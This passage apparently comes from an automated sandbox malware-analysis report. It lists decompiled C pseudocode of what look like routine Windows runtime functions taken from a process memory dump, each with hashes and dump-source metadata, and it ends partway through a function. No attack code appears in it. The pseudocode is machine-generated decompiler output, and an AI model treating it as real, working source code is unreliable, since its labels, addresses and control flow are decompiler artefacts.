                        • Opcode Fuzzy Hash: 8131fbe01d4d6c0bb6ac55b20697b6cad176bec15f826509642216ea4eef6be3
                        • Instruction Fuzzy Hash: 06912B31E007649FDF31AB68C848BBEB7B5EB05718F0506E1E924AB2D1DB789D44CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02AFC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				char _v1036;
                        				signed int _v1040;
                        				char _v1048;
                        				signed int _v1052;
                        				signed char _v1056;
                        				void* _v1058;
                        				char _v1060;
                        				signed int _v1064;
                        				void* _v1068;
                        				intOrPtr _v1072;
                        				void* _v1084;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t70;
                        				intOrPtr _t72;
                        				signed int _t74;
                        				intOrPtr _t77;
                        				signed int _t78;
                        				signed int _t81;
                        				void* _t101;
                        				signed int _t102;
                        				signed int _t107;
                        				signed int _t109;
                        				signed int _t110;
                        				signed char _t111;
                        				signed int _t112;
                        				signed int _t113;
                        				signed int _t114;
                        				intOrPtr _t116;
                        				void* _t117;
                        				char _t118;
                        				void* _t120;
                        				char _t121;
                        				signed int _t122;
                        				signed int _t123;
                        				signed int _t125;
                        
                        				_t125 = (_t123 & 0xfffffff8) - 0x424;
                        				_v8 =  *0x2bed360 ^ _t125;
                        				_t116 = _a4;
                        				_v1056 = _a16;
                        				_v1040 = _a24;
                        				if(E02B06D30( &_v1048, _a8) < 0) {
                        					L4:
                        					_pop(_t117);
                        					_pop(_t120);
                        					_pop(_t101);
                        					return E02B3B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                        				}
                        				_t70 = _a20;
                        				if(_t70 >= 0x3f4) {
                        					_t121 = _t70 + 0xc;
                        					L19:
                        					_t107 =  *( *[fs:0x30] + 0x18);
                        					__eflags = _t107;
                        					if(_t107 == 0) {
                        						L60:
                        						_t68 = 0xc0000017;
                        						goto L4;
                        					}
                        					_t72 =  *0x2be7b9c; // 0x0
                        					_t74 = L02B14620(_t107, _t107, _t72 + 0x180000, _t121);
                        					_v1064 = _t74;
                        					__eflags = _t74;
                        					if(_t74 == 0) {
                        						goto L60;
                        					}
                        					_t102 = _t74;
                        					_push( &_v1060);
                        					_push(_t121);
                        					_push(_t74);
                        					_push(2);
                        					_push( &_v1048);
                        					_push(_t116);
                        					_t122 = E02B39650();
                        					__eflags = _t122;
                        					if(_t122 >= 0) {
                        						L7:
                        						_t114 = _a12;
                        						__eflags = _t114;
                        						if(_t114 != 0) {
                        							_t77 = _a20;
                        							L26:
                        							_t109 =  *(_t102 + 4);
                        							__eflags = _t109 - 3;
                        							if(_t109 == 3) {
                        								L55:
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									L59:
                        									_t122 = 0xc0000024;
                        									L15:
                        									_t78 = _v1052;
                        									__eflags = _t78;
                        									if(_t78 != 0) {
                        										L02B177F0( *( *[fs:0x30] + 0x18), 0, _t78);
                        									}
                        									_t68 = _t122;
                        									goto L4;
                        								}
                        								_t110 = _v1056;
                        								_t118 =  *((intOrPtr*)(_t102 + 8));
                        								_v1060 = _t118;
                        								__eflags = _t110;
                        								if(_t110 == 0) {
                        									L10:
                        									_t122 = 0x80000005;
                        									L11:
                        									_t81 = _v1040;
                        									__eflags = _t81;
                        									if(_t81 == 0) {
                        										goto L15;
                        									}
                        									__eflags = _t122;
                        									if(_t122 >= 0) {
                        										L14:
                        										 *_t81 = _t118;
                        										goto L15;
                        									}
                        									__eflags = _t122 - 0x80000005;
                        									if(_t122 != 0x80000005) {
                        										goto L15;
                        									}
                        									goto L14;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                        								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                        									goto L10;
                        								}
                        								_push( *((intOrPtr*)(_t102 + 8)));
                        								_t59 = _t102 + 0xc; // 0xc
                        								_push(_t110);
                        								L54:
                        								E02B3F3E0();
                        								_t125 = _t125 + 0xc;
                        								goto L11;
                        							}
                        							__eflags = _t109 - 7;
                        							if(_t109 == 7) {
                        								goto L55;
                        							}
                        							_t118 = 4;
                        							__eflags = _t109 - _t118;
                        							if(_t109 != _t118) {
                        								__eflags = _t109 - 0xb;
                        								if(_t109 != 0xb) {
                        									__eflags = _t109 - 1;
                        									if(_t109 == 1) {
                        										__eflags = _t114 - _t118;
                        										if(_t114 != _t118) {
                        											_t118 =  *((intOrPtr*)(_t102 + 8));
                        											_v1060 = _t118;
                        											__eflags = _t118 - _t77;
                        											if(_t118 > _t77) {
                        												goto L10;
                        											}
                        											_push(_t118);
                        											_t56 = _t102 + 0xc; // 0xc
                        											_push(_v1056);
                        											goto L54;
                        										}
                        										__eflags = _t77 - _t118;
                        										if(_t77 != _t118) {
                        											L34:
                        											_t122 = 0xc0000004;
                        											goto L15;
                        										}
                        										_t111 = _v1056;
                        										__eflags = _t111 & 0x00000003;
                        										if((_t111 & 0x00000003) == 0) {
                        											_v1060 = _t118;
                        											__eflags = _t111;
                        											if(__eflags == 0) {
                        												goto L10;
                        											}
                        											_t42 = _t102 + 0xc; // 0xc
                        											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                        											_v1048 =  *((intOrPtr*)(_t102 + 8));
                        											_push(_t111);
                        											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                        											_push(0);
                        											_push( &_v1048);
                        											_t122 = E02B313C0(_t102, _t118, _t122, __eflags);
                        											L44:
                        											_t118 = _v1072;
                        											goto L11;
                        										}
                        										_t122 = 0x80000002;
                        										goto L15;
                        									}
                        									_t122 = 0xc0000024;
                        									goto L44;
                        								}
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									goto L59;
                        								}
                        								_t118 = 8;
                        								__eflags = _t77 - _t118;
                        								if(_t77 != _t118) {
                        									goto L34;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        									goto L34;
                        								}
                        								_t112 = _v1056;
                        								_v1060 = _t118;
                        								__eflags = _t112;
                        								if(_t112 == 0) {
                        									goto L10;
                        								}
                        								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                        								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                        								goto L11;
                        							}
                        							__eflags = _t114 - _t118;
                        							if(_t114 != _t118) {
                        								goto L59;
                        							}
                        							__eflags = _t77 - _t118;
                        							if(_t77 != _t118) {
                        								goto L34;
                        							}
                        							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        								goto L34;
                        							}
                        							_t113 = _v1056;
                        							_v1060 = _t118;
                        							__eflags = _t113;
                        							if(_t113 == 0) {
                        								goto L10;
                        							}
                        							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                        							goto L11;
                        						}
                        						_t118 =  *((intOrPtr*)(_t102 + 8));
                        						__eflags = _t118 - _a20;
                        						if(_t118 <= _a20) {
                        							_t114 =  *(_t102 + 4);
                        							_t77 = _t118;
                        							goto L26;
                        						}
                        						_v1060 = _t118;
                        						goto L10;
                        					}
                        					__eflags = _t122 - 0x80000005;
                        					if(_t122 != 0x80000005) {
                        						goto L15;
                        					}
                        					L02B177F0( *( *[fs:0x30] + 0x18), 0, _t102);
                        					L18:
                        					_t121 = _v1060;
                        					goto L19;
                        				}
                        				_push( &_v1060);
                        				_push(0x400);
                        				_t102 =  &_v1036;
                        				_push(_t102);
                        				_push(2);
                        				_push( &_v1048);
                        				_push(_t116);
                        				_t122 = E02B39650();
                        				if(_t122 >= 0) {
                        					__eflags = 0;
                        					_v1052 = 0;
                        					goto L7;
                        				}
                        				if(_t122 == 0x80000005) {
                        					goto L18;
                        				}
                        				goto L4;
                        			}


                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 25721b77bd66485f9f5afaaf7108d74aa7a7bbb30e3bb7da35be927a12638528
                        • Instruction ID: be60ecadc3383f1d2227ba15d8c5f65b7a4fb1d0717bce0dd7bcadbbaa4ffd14
                        • Opcode Fuzzy Hash: 25721b77bd66485f9f5afaaf7108d74aa7a7bbb30e3bb7da35be927a12638528
                        • Instruction Fuzzy Hash: 3E81B1756046029BCB21CE14C894B7AF3E5FF8835CF1848AAEE558B240DB39DD40DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E02B8B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t80;
                        				signed int _t83;
                        				intOrPtr _t89;
                        				signed int _t92;
                        				signed char _t106;
                        				signed int* _t107;
                        				intOrPtr _t108;
                        				intOrPtr _t109;
                        				signed int _t114;
                        				void* _t115;
                        				void* _t117;
                        				void* _t119;
                        				void* _t122;
                        				signed int _t123;
                        				signed int* _t124;
                        
                        				_t106 = _a12;
                        				if((_t106 & 0xfffffffc) != 0) {
                        					return 0xc000000d;
                        				}
                        				if((_t106 & 0x00000002) != 0) {
                        					_t106 = _t106 | 0x00000001;
                        				}
                        				_t109 =  *0x2be7b9c; // 0x0
                        				_t124 = L02B14620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                        				if(_t124 != 0) {
                        					 *_t124 =  *_t124 & 0x00000000;
                        					_t124[1] = _t124[1] & 0x00000000;
                        					_t124[4] = _t124[4] & 0x00000000;
                        					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                        						L13:
                        						_push(_t124);
                        						if((_t106 & 0x00000002) != 0) {
                        							_push(0x200);
                        							_push(0x28);
                        							_push(0xffffffff);
                        							_t122 = E02B39800();
                        							if(_t122 < 0) {
                        								L33:
                        								if((_t124[4] & 0x00000001) != 0) {
                        									_push(4);
                        									_t64 =  &(_t124[1]); // 0x4
                        									_t107 = _t64;
                        									_push(_t107);
                        									_push(5);
                        									_push(0xfffffffe);
                        									E02B395B0();
                        									if( *_t107 != 0) {
                        										_push( *_t107);
                        										E02B395D0();
                        									}
                        								}
                        								_push(_t124);
                        								_push(0);
                        								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        								L37:
                        								L02B177F0();
                        								return _t122;
                        							}
                        							_t124[4] = _t124[4] | 0x00000002;
                        							L18:
                        							_t108 = _a8;
                        							_t29 =  &(_t124[0x105]); // 0x414
                        							_t80 = _t29;
                        							_t30 =  &(_t124[5]); // 0x14
                        							_t124[3] = _t80;
                        							_t123 = 0;
                        							_t124[2] = _t30;
                        							 *_t80 = _t108;
                        							if(_t108 == 0) {
                        								L21:
                        								_t112 = 0x400;
                        								_push( &_v8);
                        								_v8 = 0x400;
                        								_push(_t124[2]);
                        								_push(0x400);
                        								_push(_t124[3]);
                        								_push(0);
                        								_push( *_t124);
                        								_t122 = E02B39910();
                        								if(_t122 != 0xc0000023) {
                        									L26:
                        									if(_t122 != 0x106) {
                        										L40:
                        										if(_t122 < 0) {
                        											L29:
                        											_t83 = _t124[2];
                        											if(_t83 != 0) {
                        												_t59 =  &(_t124[5]); // 0x14
                        												if(_t83 != _t59) {
                        													L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                        												}
                        											}
                        											_push( *_t124);
                        											E02B395D0();
                        											goto L33;
                        										}
                        										 *_a16 = _t124;
                        										return 0;
                        									}
                        									if(_t108 != 1) {
                        										_t122 = 0;
                        										goto L40;
                        									}
                        									_t122 = 0xc0000061;
                        									goto L29;
                        								} else {
                        									goto L22;
                        								}
                        								while(1) {
                        									L22:
                        									_t89 =  *0x2be7b9c; // 0x0
                        									_t92 = L02B14620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                        									_t124[2] = _t92;
                        									if(_t92 == 0) {
                        										break;
                        									}
                        									_t112 =  &_v8;
                        									_push( &_v8);
                        									_push(_t92);
                        									_push(_v8);
                        									_push(_t124[3]);
                        									_push(0);
                        									_push( *_t124);
                        									_t122 = E02B39910();
                        									if(_t122 != 0xc0000023) {
                        										goto L26;
                        									}
                        									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                        								}
                        								_t122 = 0xc0000017;
                        								goto L26;
                        							}
                        							_t119 = 0;
                        							do {
                        								_t114 = _t124[3];
                        								_t119 = _t119 + 0xc;
                        								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                        								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                        								_t123 = _t123 + 1;
                        								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                        							} while (_t123 < _t108);
                        							goto L21;
                        						}
                        						_push(0x28);
                        						_push(3);
                        						_t122 = E02AFA7B0();
                        						if(_t122 < 0) {
                        							goto L33;
                        						}
                        						_t124[4] = _t124[4] | 0x00000001;
                        						goto L18;
                        					}
                        					if((_t106 & 0x00000001) == 0) {
                        						_t115 = 0x28;
                        						_t122 = E02B8E7D3(_t115, _t124);
                        						if(_t122 < 0) {
                        							L9:
                        							_push(_t124);
                        							_push(0);
                        							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        							goto L37;
                        						}
                        						L12:
                        						if( *_t124 != 0) {
                        							goto L18;
                        						}
                        						goto L13;
                        					}
                        					_t15 =  &(_t124[1]); // 0x4
                        					_t117 = 4;
                        					_t122 = E02B8E7D3(_t117, _t15);
                        					if(_t122 >= 0) {
                        						_t124[4] = _t124[4] | 0x00000001;
                        						_v12 = _v12 & 0x00000000;
                        						_push(4);
                        						_push( &_v12);
                        						_push(5);
                        						_push(0xfffffffe);
                        						E02B395B0();
                        						goto L12;
                        					}
                        					goto L9;
                        				} else {
                        					return 0xc0000017;
                        				}
                        			}





















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d89ee4c4560e9cf2b302a72f0b793c8dafcf0f0c2725c63ea9a8053ac4b374af
                        • Instruction ID: f82e9fec7bb1769ddb61949bfb1b0d5bf1f05f3541c3cdc87184fe0b0a4fc464
                        • Opcode Fuzzy Hash: d89ee4c4560e9cf2b302a72f0b793c8dafcf0f0c2725c63ea9a8053ac4b374af
                        • Instruction Fuzzy Hash: 55710032240B01EFDB32EF24C844F66B7E6EF44728F1545A8E669CB2A0DB75E945CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E02B76DC9(signed int __ecx, void* __edx) {
                        				unsigned int _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				char _v32;
                        				char _v36;
                        				char _v40;
                        				char _v44;
                        				char _v48;
                        				char _v52;
                        				char _v56;
                        				char _v60;
                        				void* _t87;
                        				void* _t95;
                        				signed char* _t96;
                        				signed int _t107;
                        				signed int _t136;
                        				signed char* _t137;
                        				void* _t157;
                        				void* _t161;
                        				void* _t167;
                        				intOrPtr _t168;
                        				void* _t174;
                        				void* _t175;
                        				signed int _t176;
                        				void* _t177;
                        
                        				_t136 = __ecx;
                        				_v44 = 0;
                        				_t167 = __edx;
                        				_v40 = 0;
                        				_v36 = 0;
                        				_v32 = 0;
                        				_v60 = 0;
                        				_v56 = 0;
                        				_v52 = 0;
                        				_v48 = 0;
                        				_v16 = __ecx;
                        				_t87 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                        				_t175 = _t87;
                        				if(_t175 != 0) {
                        					_t11 = _t175 + 0x30; // 0x30
                        					 *((short*)(_t175 + 6)) = 0x14d4;
                        					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                        					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                        					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                        					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                        					E02B76B4C(_t167, _t11, 0x214,  &_v8);
                        					_v12 = _v8 + 0x10;
                        					_t95 = E02B17D50();
                        					_t137 = 0x7ffe0384;
                        					if(_t95 == 0) {
                        						_t96 = 0x7ffe0384;
                        					} else {
                        						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t175);
                        					_push(_v12);
                        					_push(0x402);
                        					_push( *_t96 & 0x000000ff);
                        					E02B39AE0();
                        					_t87 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                        					_t176 = _v16;
                        					if((_t176 & 0x00000100) != 0) {
                        						_push( &_v36);
                        						_t157 = 4;
                        						_t87 = E02B7795D( *((intOrPtr*)(_t167 + 8)), _t157);
                        						if(_t87 >= 0) {
                        							_v24 = E02B7795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                        							_v28 = E02B7795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                        							_push( &_v52);
                        							_t161 = 5;
                        							_t168 = E02B7795D( *((intOrPtr*)(_t167 + 8)), _t161);
                        							_v20 = _t168;
                        							_t107 = L02B14620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                        							_v16 = _t107;
                        							if(_t107 != 0) {
                        								_v8 = _v8 & 0x00000000;
                        								 *(_t107 + 0x20) = _t176;
                        								 *((short*)(_t107 + 6)) = 0x14d5;
                        								_t47 = _t107 + 0x24; // 0x24
                        								_t177 = _t47;
                        								E02B76B4C( &_v36, _t177, 0xc78,  &_v8);
                        								_t51 = _v8 + 4; // 0x4
                        								_t178 = _t177 + (_v8 >> 1) * 2;
                        								_v12 = _t51;
                        								E02B76B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_v12 = _v12 + _v8;
                        								E02B76B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_t125 = _v8;
                        								_v12 = _v12 + _v8;
                        								E02B76B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                        								_t174 = _v12 + _v8;
                        								if(E02B17D50() != 0) {
                        									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        								}
                        								_push(_v16);
                        								_push(_t174);
                        								_push(0x402);
                        								_push( *_t137 & 0x000000ff);
                        								E02B39AE0();
                        								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                        								_t168 = _v20;
                        							}
                        							_t87 = L02B12400( &_v36);
                        							if(_v24 >= 0) {
                        								_t87 = L02B12400( &_v44);
                        							}
                        							if(_t168 >= 0) {
                        								_t87 = L02B12400( &_v52);
                        							}
                        							if(_v28 >= 0) {
                        								return L02B12400( &_v60);
                        							}
                        						}
                        					}
                        				}
                        				return _t87;
                        			}
































                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction ID: 3e397923cd40823299fc098d615aefea28e9cd9fc86473ea6b7038a8d93463a1
                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction Fuzzy Hash: 1F716D71A00619AFCB11DFA4C984AEEFBBAFF48714F1441A9E515A7290DB30AA41DF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02AF52A5(char __ecx) {
                        				char _v20;
                        				char _v28;
                        				char _v29;
                        				void* _v32;
                        				void* _v36;
                        				void* _v37;
                        				void* _v38;
                        				void* _v40;
                        				void* _v46;
                        				void* _v64;
                        				void* __ebx;
                        				intOrPtr* _t49;
                        				signed int _t53;
                        				short _t85;
                        				signed int _t87;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t101;
                        				intOrPtr* _t102;
                        				intOrPtr* _t104;
                        				signed int _t106;
                        				void* _t108;
                        
                        				_t93 = __ecx;
                        				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                        				_push(_t88);
                        				_v29 = __ecx;
                        				_t89 = _t88 | 0xffffffff;
                        				while(1) {
                        					E02B0EEF0(0x2be79a0);
                        					_t104 =  *0x2be8210; // 0x601cb0
                        					if(_t104 == 0) {
                        						break;
                        					}
                        					asm("lock inc dword [esi]");
                        					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                        					E02B0EB70(_t93, 0x2be79a0);
                        					if( *((char*)(_t108 + 0xf)) != 0) {
                        						_t101 =  *0x7ffe02dc;
                        						__eflags =  *(_t104 + 0x14) & 0x00000001;
                        						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                        							L9:
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0x90028);
                        							_push(_t108 + 0x20);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push( *((intOrPtr*)(_t104 + 4)));
                        							_t53 = E02B39890();
                        							__eflags = _t53;
                        							if(_t53 >= 0) {
                        								__eflags =  *(_t104 + 0x14) & 0x00000001;
                        								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                        									E02B0EEF0(0x2be79a0);
                        									 *((intOrPtr*)(_t104 + 8)) = _t101;
                        									E02B0EB70(0, 0x2be79a0);
                        								}
                        								goto L3;
                        							}
                        							__eflags = _t53 - 0xc0000012;
                        							if(__eflags == 0) {
                        								L12:
                        								_t13 = _t104 + 0xc; // 0x601cbd
                        								_t93 = _t13;
                        								 *((char*)(_t108 + 0x12)) = 0;
                        								__eflags = E02B2F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								if(__eflags >= 0) {
                        									L15:
                        									_t102 = _v28;
                        									 *_t102 = 2;
                        									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        									E02B0EEF0(0x2be79a0);
                        									__eflags =  *0x2be8210 - _t104; // 0x601cb0
                        									if(__eflags == 0) {
                        										__eflags =  *((char*)(_t108 + 0xe));
                        										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                        										 *0x2be8210 = _t102;
                        										_t32 = _t102 + 0xc; // 0x0
                        										 *_t95 =  *_t32;
                        										_t33 = _t102 + 0x10; // 0x0
                        										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                        										_t35 = _t102 + 4; // 0xffffffff
                        										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                        										if(__eflags != 0) {
                        											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                        											E02B74888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                        										}
                        										E02B0EB70(_t95, 0x2be79a0);
                        										asm("lock xadd [esi], eax");
                        										if(__eflags == 0) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E02B395D0();
                        											L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										asm("lock xadd [esi], ebx");
                        										__eflags = _t89 == 1;
                        										if(_t89 == 1) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E02B395D0();
                        											L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										_t49 = _t102;
                        										L4:
                        										return _t49;
                        									}
                        									E02B0EB70(_t93, 0x2be79a0);
                        									asm("lock xadd [esi], eax");
                        									if(__eflags == 0) {
                        										_push( *((intOrPtr*)(_t104 + 4)));
                        										E02B395D0();
                        										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        									}
                        									 *_t102 = 1;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										_t28 = _t102 + 4; // 0xffffffff
                        										_push( *_t28);
                        										E02B395D0();
                        										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                        									}
                        									continue;
                        								}
                        								_t93 =  &_v20;
                        								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                        								_t85 = 6;
                        								_v20 = _t85;
                        								_t87 = E02B2F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								__eflags = _t87;
                        								if(_t87 < 0) {
                        									goto L3;
                        								}
                        								 *((char*)(_t108 + 0xe)) = 1;
                        								goto L15;
                        							}
                        							__eflags = _t53 - 0xc000026e;
                        							if(__eflags != 0) {
                        								goto L3;
                        							}
                        							goto L12;
                        						}
                        						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                        						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                        							goto L3;
                        						} else {
                        							goto L9;
                        						}
                        					}
                        					L3:
                        					_t49 = _t104;
                        					goto L4;
                        				}
                        				_t49 = 0;
                        				goto L4;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b252fdabbb66580589fa5bdbfa4e094d8c961566c52584a743626a8a78c076f4
                        • Instruction ID: 7605394dba98a054a30826b93aeb1da1ed3f4eaebd2e83a965a13d801c608f92
                        • Opcode Fuzzy Hash: b252fdabbb66580589fa5bdbfa4e094d8c961566c52584a743626a8a78c076f4
                        • Instruction Fuzzy Hash: 3751DD31505741ABD722EF68C880B27FBE5FF58710F100D9AF9968B691EB74E844CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B22AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                        				signed short* _v8;
                        				signed short* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr* _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				short _t56;
                        				signed int _t57;
                        				intOrPtr _t58;
                        				signed short* _t61;
                        				intOrPtr _t72;
                        				intOrPtr _t75;
                        				intOrPtr _t84;
                        				intOrPtr _t87;
                        				intOrPtr* _t90;
                        				signed short* _t91;
                        				signed int _t95;
                        				signed short* _t96;
                        				intOrPtr _t97;
                        				intOrPtr _t102;
                        				signed int _t108;
                        				intOrPtr _t110;
                        				signed int _t111;
                        				signed short* _t112;
                        				void* _t113;
                        				signed int _t116;
                        				signed short** _t119;
                        				short* _t120;
                        				signed int _t123;
                        				signed int _t124;
                        				void* _t125;
                        				intOrPtr _t127;
                        				signed int _t128;
                        
                        				_t90 = __ecx;
                        				_v16 = __edx;
                        				_t108 = _a4;
                        				_v28 = __ecx;
                        				_t4 = _t108 - 1; // -1
                        				if(_t4 > 0x13) {
                        					L15:
                        					_t56 = 0xc0000100;
                        					L16:
                        					return _t56;
                        				}
                        				_t57 = _t108 * 0x1c;
                        				_v32 = _t57;
                        				_t6 = _t57 + 0x2be8204; // 0x0
                        				_t123 =  *_t6;
                        				_t7 = _t57 + 0x2be8208; // 0x2be8207
                        				_t8 = _t57 + 0x2be8208; // 0x2be8207
                        				_t119 = _t8;
                        				_v36 = _t123;
                        				_t110 = _t7 + _t123 * 8;
                        				_v24 = _t110;
                        				_t111 = _a4;
                        				if(_t119 >= _t110) {
                        					L12:
                        					if(_t123 != 3) {
                        						_t58 =  *0x2be8450; // 0x0
                        						if(_t58 == 0) {
                        							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                        						}
                        					} else {
                        						_t26 = _t57 + 0x2be821c; // 0x0
                        						_t58 =  *_t26;
                        					}
                        					 *_t90 = _t58;
                        					goto L15;
                        				} else {
                        					goto L2;
                        				}
                        				while(1) {
                        					_t116 =  *_t61 & 0x0000ffff;
                        					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        					if(_t116 == _t128) {
                        						goto L18;
                        					}
                        					L5:
                        					if(_t116 >= 0x61) {
                        						if(_t116 > 0x7a) {
